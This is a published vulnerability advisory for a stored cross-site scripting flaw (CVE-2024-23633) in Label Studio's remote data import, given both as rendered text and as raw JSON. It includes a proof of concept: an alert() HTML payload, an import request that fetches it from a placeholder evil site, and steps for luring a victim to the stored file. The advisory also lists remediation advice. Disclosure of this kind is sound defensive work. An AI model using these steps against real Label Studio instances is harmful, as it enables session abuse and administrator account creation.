GHSA-FQ23-G58M-799R
Vulnerability from github – Published: 2024-01-24 14:21 – Updated: 2024-11-22 18:20Introduction
This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.10.1 and was tested on version 1.9.2.post0.
Overview
Label Studio had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.
Description
The following code snippet in Label Studio showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.
def tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):
"""Download file using URL and read tasks from it"""
# process URL with tasks
try:
filename = url.rsplit('/', 1)[-1] <1>
response = ssrf_safe_get(
url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={'Accept-Encoding': None}
)
file_content = response.content
check_tasks_max_file_size(int(response.headers['content-length']))
file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))
if file_upload.format_could_be_tasks_list:
could_be_tasks_list = True
file_upload_ids.append(file_upload.id)
tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)
except ValidationError as e:
raise e
except Exception as e:
raise ValidationError(str(e))
return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list
- The file name that was set was retrieved from the URL.
The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}] where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the following code snippet demonstrated that the Content-Type of the response was determined by the file extension, since mimetypes.guess_type guesses the Content-Type based on the file extension.
class UploadedFileResponse(generics.RetrieveAPIView):
permission_classes = (IsAuthenticated,)
@swagger_auto_schema(auto_schema=None)
def get(self, *args, **kwargs):
request = self.request
filename = kwargs['filename']
# XXX needed, on windows os.path.join generates '\' which breaks FileUpload
file = settings.UPLOAD_DIR + ('/' if not settings.UPLOAD_DIR.endswith('/') else '') + filename
logger.debug(f'Fetch uploaded file by user {request.user} => {file}')
file_upload = FileUpload.objects.filter(file=file).last()
if not file_upload.has_permission(request.user):
return Response(status=status.HTTP_403_FORBIDDEN)
file = file_upload.file
if file.storage.exists(file.name):
content_type, encoding = mimetypes.guess_type(str(file.name)) <1>
content_type = content_type or 'application/octet-stream'
return RangedFileResponse(request, file.open(mode='rb'), content_type=content_type)
else:
return Response(status=status.HTTP_404_NOT_FOUND)
- Determines the
Content-Typebased on the extension of the uploaded file by usingmimetypes.guess_type.
Since the Content-Type was determined by the file extension of the downloaded file, an attacker could import in a .html file that would execute JavaScript when visited.
Proof of Concept
Below were the steps to recreate this issue:
- Host the following HTML proof of concept (POC) script on an external website with the file extension
.htmlthat would be downloaded to the Label Studio website.
<html>
<body>
<h1>Data Import XSS</h1>
<script>
alert(document.domain);
</script>
</body>
</html>
- Send the following
POSTrequest to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the{victim_host}is the address and port of the victim Label Studio website (eg.labelstudio.com:8080),{project_id}is the ID of the project where the data would be imported into,{cookies}are session cookies and{evil_site}is the website hosting the malicious HTML file (namedxss.htmlin the following example).
POST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1
Host: {victim_host}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Cookie: {cookies}
Pragma: no-cache
Cache-Control: no-cache
url=https://{evil_site}/xss.html
-
To retrieve the downloaded file path could be retrieved by sending a
GETrequest to/api/projects/{project_id}/file-uploads?ids=[{download_id}], where{download_id}is the ID of the file download from the previous step. -
Send your victim a link to
/data/{file_path}, where{file_path}is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting/data/upload/1/cfcfc340-xss.html.

Impact
Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.
Remediation Advice
- For all user provided files that are downloaded by Label Studio, set the
Content-Security-Policy: sandbox;response header when viewed on the site. Thesandboxdirective restricts a page's actions to prevent popups, execution of plugins and scripts and enforces asame-originpolicy (documentation). - Restrict the allowed file extensions that could be downloaded.
Discovered
- August 2023, Alex Brown, elttam
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "label-studio"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.10.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-23633"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2024-01-24T14:21:47Z",
"nvd_published_at": "2024-01-24T00:15:08Z",
"severity": "MODERATE"
},
"details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to `1.10.1` and was tested on version `1.9.2.post0`.\n\n# Overview\n\n[Label Studio](https://github.com/HumanSignal/label-studio) had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.\n\n# Description\n\nThe following [code snippet in Label Studio](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146) showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.\n\n```python\ndef tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):\n \"\"\"Download file using URL and read tasks from it\"\"\"\n # process URL with tasks\n try:\n filename = url.rsplit(\u0027/\u0027, 1)[-1] \u003c1\u003e\n\n response = ssrf_safe_get(\n url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={\u0027Accept-Encoding\u0027: None}\n )\n file_content = response.content\n check_tasks_max_file_size(int(response.headers[\u0027content-length\u0027]))\n file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))\n if file_upload.format_could_be_tasks_list:\n could_be_tasks_list = True\n file_upload_ids.append(file_upload.id)\n tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)\n\n except ValidationError as e:\n raise e\n except Exception as e:\n raise ValidationError(str(e))\n return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list\n```\n1. The file name that was set was retrieved from the URL.\n\nThe downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the [following code snippet](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62) demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension.\n\n```python\nclass UploadedFileResponse(generics.RetrieveAPIView):\n permission_classes = (IsAuthenticated,)\n\n @swagger_auto_schema(auto_schema=None)\n def get(self, *args, **kwargs):\n request = self.request\n filename = kwargs[\u0027filename\u0027]\n # XXX needed, on windows os.path.join generates \u0027\\\u0027 which breaks FileUpload\n file = settings.UPLOAD_DIR + (\u0027/\u0027 if not settings.UPLOAD_DIR.endswith(\u0027/\u0027) else \u0027\u0027) + filename\n logger.debug(f\u0027Fetch uploaded file by user {request.user} =\u003e {file}\u0027)\n file_upload = FileUpload.objects.filter(file=file).last()\n\n if not file_upload.has_permission(request.user):\n return Response(status=status.HTTP_403_FORBIDDEN)\n\n file = file_upload.file\n if file.storage.exists(file.name):\n content_type, encoding = mimetypes.guess_type(str(file.name)) \u003c1\u003e\n content_type = content_type or \u0027application/octet-stream\u0027\n return RangedFileResponse(request, file.open(mode=\u0027rb\u0027), content_type=content_type)\n else:\n return Response(status=status.HTTP_404_NOT_FOUND)\n```\n1. Determines the `Content-Type` based on the extension of the uploaded file by using `mimetypes.guess_type`.\n\nSince the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\n# Proof of Concept\n\nBelow were the steps to recreate this issue:\n\n1. Host the following HTML proof of concept (POC) script on an external website with the file extension `.html` that would be downloaded to the Label Studio website.\n\n```html\n\u003chtml\u003e\n \u003cbody\u003e\n \u003ch1\u003eData Import XSS\u003c/h1\u003e\n \u003cscript\u003e\n alert(document.domain);\n \u003c/script\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n```\n\n2. Send the following `POST` request to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the `{victim_host}` is the address and port of the victim Label Studio website (eg. `labelstudio.com:8080`), `{project_id}` is the ID of the project where the data would be imported into, `{cookies}` are session cookies and `{evil_site}` is the website hosting the malicious HTML file (named `xss.html` in the following example).\n\n```http\nPOST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1\nHost: {victim_host}\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\nContent-Length: 43\nConnection: close\nCookie: {cookies}\nPragma: no-cache\nCache-Control: no-cache\n\nurl=https://{evil_site}/xss.html\n```\n\n3. To retrieve the downloaded file path could be retrieved by sending a `GET` request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{download_id}` is the ID of the file download from the previous step.\n\n4. Send your victim a link to `/data/{file_path}`, where `{file_path}` is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting `/data/upload/1/cfcfc340-xss.html`.\n\n\n\n# Impact\n\nExecuting arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n# Remediation Advice\n\n* For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy ([documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox)).\n* Restrict the allowed file extensions that could be downloaded.\n\n# Discovered\n- August 2023, Alex Brown, elttam",
"id": "GHSA-fq23-g58m-799r",
"modified": "2024-11-22T18:20:58Z",
"published": "2024-01-24T14:21:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23633"
},
{
"type": "WEB",
"url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
},
{
"type": "PACKAGE",
"url": "https://github.com/HumanSignal/label-studio"
},
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
},
{
"type": "WEB",
"url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
},
{
"type": "WEB",
"url": "https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2024-128.yaml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Cross-site Scripting Vulnerability on Data Import"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.